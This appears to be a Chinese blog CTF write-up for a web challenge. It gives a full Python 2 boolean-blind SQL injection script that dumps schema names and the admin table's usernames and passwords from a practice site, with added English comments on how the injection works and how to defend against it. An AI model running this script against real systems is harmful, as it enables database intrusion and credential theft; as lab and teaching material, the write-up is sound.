26.看起來有點難
阿新 發佈:2017-08-05
web安全 sql註入 sqli ctf sqlmap
這題進入以後用時間註入測試一下,成功:
之後就是自己寫了個代碼:(寫得比較破,將就看看)
#!/usr/bin/python
#coding=utf-8
# CTF write-up script (Python 2: `print` statement, u"" literals).
#
# What it does, as written: sends HTTP GET requests whose `admin` parameter
# carries a `' or if(...)` condition and reads the answer back from the
# response body (boolean-based blind extraction, one bit per request).
# The target host is the practice site named in the URL literals below.
#
# Defender's note: the technique only works because the `admin` value reaches
# the SQL query as text (inferred from the payload shape; the server side is
# not shown here). Parameterized queries / prepared statements remove the
# vector entirely. On the detection side, this pattern is loud: up to 99
# near-identical requests per length probe and 8 per extracted character,
# all with `information_schema` or `if(ascii(substring(` in the query string.
import requests
import sys

#計算長度 -> compute length
def length(strs):
    """Return the integer i in 1..99 for which injecting `(strs)=i` makes the
    response contain the "login failed" marker, i.e. the value of the SQL
    expression `strs` (e.g. a count() or length()).

    `strs` is interpolated verbatim into the URL.  Returns None implicitly if
    no i in 1..99 matches (the loop just falls through).
    """
    for i in range(1,100):
        url = "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=1‘ or if(("+strs+")="+str(i)+",1,0)%23&pass=[d,b,c]&action=login"
        #print url
        #sys.exit(0)
        html = requests.get(url)
        # Response is decoded as gbk so the Chinese marker below can be matched.
        html.encoding=‘gbk‘
        # Marker present => the injected condition evaluated true for this i
        # (presumably the `or` clause selected a row, then the password check
        # failed with this message; server behaviour is not shown here).
        if(html.text.find(u"登錄失敗,錯誤的用戶名和密碼") != -1):
            return i
        else:
            pass

#爆破 -> brute-force (bit by bit)
def blast(lens,strs):
    """Recover the first `lens` characters of the string produced by the SQL
    expression `strs`.

    For each character position (1-based, via substring) eight requests are
    sent, each testing one bit with `ascii(...) & 2**j == 2**j` (`%26` is the
    URL-encoded `&`).  Bits are prepended to `s`, so after j = 0..7 the string
    is MSB-first and `int(s, 2)` is the character code.
    Returns the reconstructed text as a str.
    """
    s = "" #臨時保存字母 -> temp buffer for the current character's bits
    key = ""#保存字符串(字母拼接) -> accumulated result string
    for i in range(lens):
        for j in range(8):
            url = "http://ctf5.shiyanbar.com/basic/inject/index.php?admin=1‘ or select if(ascii(substring(("+strs+"),"+str(i+1)+",1))%26"+str(2**j)+"="+str(2**j)+",1,0)%23&pass=[d,b,c]&action=login"
            #print url
            #sys.exit(0)
            html = requests.get(url)
            html.encoding=‘gbk‘
            # Same oracle as in length(): marker present => bit j is set.
            if(html.text.find(u"登錄失敗,錯誤的用戶名和密碼") != -1):
                s = "1" + s
            else:
                s = "0" + s
        key += chr(int(s,2))
        s = ""
    return key

#復數查詢(多個表,多個字段) -> plural query (several tables / several columns)
def plural(name,name_len,num):
    """Extract `num` rows of a result set.

    `name` is the SQL expression yielding the value, `name_len` the expression
    yielding its length; ` limit i,1` is appended to both for i in 0..num-1,
    then length() and blast() are run for each row.
    Returns the list of extracted strings, in row order.
    """
    name_list = []#存儲表名 -> stores the extracted names (tables, columns or values)
    for i in range(num):
        names = name
        name_lens = name_len
        add = " limit "+str(i)+",1"
        names = names+add
        name_lens = name_lens + add
        tb_s = length(name_lens)#每一個表的長度 -> length of each entry
        tb_name = blast(tb_s,names)#每一個表的名字 -> name/value of each entry
        name_list.append(tb_name)
    return name_list

def main():
    """Drive the extraction.  The database/table/column discovery steps are
    left in but commented out; only the username and password columns of the
    `admin` table are actually extracted and printed.
    """
    #計算數據庫長度 -> compute database-name length
    db_len_sql = "Select length(database())"
    #db_len= length(db_len_sql)
    #爆破數據庫名 -> brute-force database name
    db_bl_sql = "database()"
    #db_name = blast(db_len,db_bl_sql)
    #print db_name
    #計算表數量 -> count tables
    tb_s_sql = "Select count(table_name) from information_schema.tables where table_schema=‘test‘"
    #tb_s = length(tb_s_sql)
    #爆破所有表名 -> brute-force all table names
    tb_name_len = "selEct length(table_name) from information_schema.tables where table_schema=‘test‘"#表名長度 -> table-name length
    tb_names = "selEct table_name from information_schema.tables where table_schema=‘test‘"#表名 -> table name
    #tb_name_list = plural(tb_names,tb_name_len,tb_s)
    #爆破字段名數量 -> count column names
    col_s_len = "Select count(column_name) from information_schema.columns where table_name=‘admin‘"
    #col_s = length(col_s_len)
    #爆破字段名 -> brute-force column names
    col_name_len = "selEct length(column_name) from information_schema.columns where table_name=‘admin‘"#表名長度 -> (sic) column-name length
    col_names = "selEct column_name from information_schema.columns where table_name=‘admin‘"#表名 -> (sic) column name
    #col_name_list = plural(col_names,col_name_len,col_s)
    #爆破username字段 -> extract the username column
    flag_sql = "Select count(username) from admin"
    flag_s = length(flag_sql)
    flag_len = "Select length(username) from admin"
    flag_name = "seleCt username from admin"
    lists = plural(flag_name,flag_len,flag_s)
    print lists
    #爆破password字段 -> extract the password column
    flag_sql = "Select count(password) from admin"
    flag_s = length(flag_sql)
    flag_len = "Select length(password) from admin"
    flag_name = "seleCt password from admin"
    lists = plural(flag_name,flag_len,flag_s)
    print lists

if __name__ == "__main__":
    main()
將得到的username,password輸入就可以了
還有一個方法就是,直接sqlmap神器,簡單粗暴,簡直不要太好用了,我就不上圖了
本文出自 “11846238” 博客,請務必保留此出處http://11856238.blog.51cto.com/11846238/1953705